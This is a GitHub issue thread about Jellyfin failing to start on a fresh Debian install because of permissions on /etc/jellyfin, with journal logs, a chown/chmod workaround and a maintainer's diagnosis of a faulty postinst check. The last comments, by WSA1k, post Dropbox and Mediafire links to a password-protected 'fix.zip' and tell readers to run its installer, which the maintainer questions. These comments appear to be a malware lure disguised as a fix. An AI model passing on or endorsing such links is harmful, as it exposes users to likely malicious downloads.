### ISSUE TITLE
New Debian install does not have permissions to /etc/jellyfin

### ISSUE THREAD

**Issue by NickPaul41** [jellyfin/jellyfin-packaging#37]
I did a new install on debian bookworm. I used the auto installer script and the jellyfin.service does not start. Journalctl -u jellyfin shows the following. 

```
Aug 25 21:08:12 jellyfin jellyfin[3864]: Unhandled exception. System.UnauthorizedAccessException: Access to the path '/etc/jellyfin/logging.default.json' is denied.
Aug 25 21:08:12 jellyfin jellyfin[3864]:  ---> System.IO.IOException: Permission denied
Aug 25 21:08:12 jellyfin jellyfin[3864]:    --- End of inner exception stack trace ---
Aug 25 21:08:12 jellyfin jellyfin[3864]:    at Interop.ThrowExceptionForIoErrno(ErrorInfo errorInfo, String path, Boolean isDirError)
Aug 25 21:08:12 jellyfin jellyfin[3864]:    at Microsoft.Win32.SafeHandles.SafeFileHandle.Open(String path, OpenFlags flags, Int32 mode, Boolean failForSymlink, Boolean& w>
Aug 25 21:08:12 jellyfin jellyfin[3864]:    at Microsoft.Win32.SafeHandles.SafeFileHandle.Open(String fullPath, FileMode mode, FileAccess access, FileShare share, FileOpti>
Aug 25 21:08:12 jellyfin jellyfin[3864]:    at System.IO.Strategies.OSFileStreamStrategy..ctor(String path, FileMode mode, FileAccess access, FileShare share, FileOptions >
Aug 25 21:08:12 jellyfin jellyfin[3864]:    at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions opt>
Aug 25 21:08:12 jellyfin jellyfin[3864]:    at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions opt>
Aug 25 21:08:12 jellyfin jellyfin[3864]:    at Jellyfin.Server.Helpers.StartupHelpers.InitLoggingConfigFile(IApplicationPaths appPaths)
Aug 25 21:08:12 jellyfin jellyfin[3864]:    at Jellyfin.Server.Helpers.StartupHelpers.InitLoggingConfigFile(IApplicationPaths appPaths)
Aug 25 21:08:12 jellyfin jellyfin[3864]:    at Jellyfin.Server.Program.StartApp(StartupOptions options)
Aug 25 21:08:12 jellyfin jellyfin[3864]:    at Jellyfin.Server.Program.<Main>(String[] args)
Aug 25 21:08:12 jellyfin systemd[1]: jellyfin.service: Main process exited, code=killed, status=6/ABRT
Aug 25 21:08:12 jellyfin systemd[1]: jellyfin.service: Failed with result 'signal'.
Aug 25 21:08:13 jellyfin systemd[1]: jellyfin.service: Scheduled restart job, restart counter is at 2.
Aug 25 21:08:13 jellyfin systemd[1]: Stopped jellyfin.service - Jellyfin Media Server.
Aug 25 21:08:13 jellyfin systemd[1]: Started jellyfin.service - Jellyfin Media Server.
```

It looks like the permissions update in debian/jellyfin-server.postinst never ran. I new to this repo but I'm expecting that /etc/jellyfin to be created before the postinstall executes. After running

```
chown -R ${JELLYFIN_USER} $PROGRAMDATA $CONFIGDATA $LOGDATA $CACHEDATA
chgrp adm $PROGRAMDATA $CONFIGDATA $LOGDATA $CACHEDATA
chmod 0750 $PROGRAMDATA $CONFIGDATA $LOGDATA $CACHEDATA
```

Everything is up and running again.

**Comment by joshuaboniface** [comment]
Hm, looks like the bugfix to #32 actually caused this breakage. The conditional we're using for `/etc/jellyfin` won't work because that directory will exist when it runs.

Should be a relatively easy fix to look for a particular file instead.

**Comment by joshuaboniface** [comment]
It's a pretty annoying breakage, but I think we'll be doing another point release very soon so I'm going to just include this there. For now I've added a quick little hack into `install-debuntu.sh` that should hopefully fix it during install.

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by joshuaboniface** [comment]
@WSA1k I'm sorry what is this for?

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
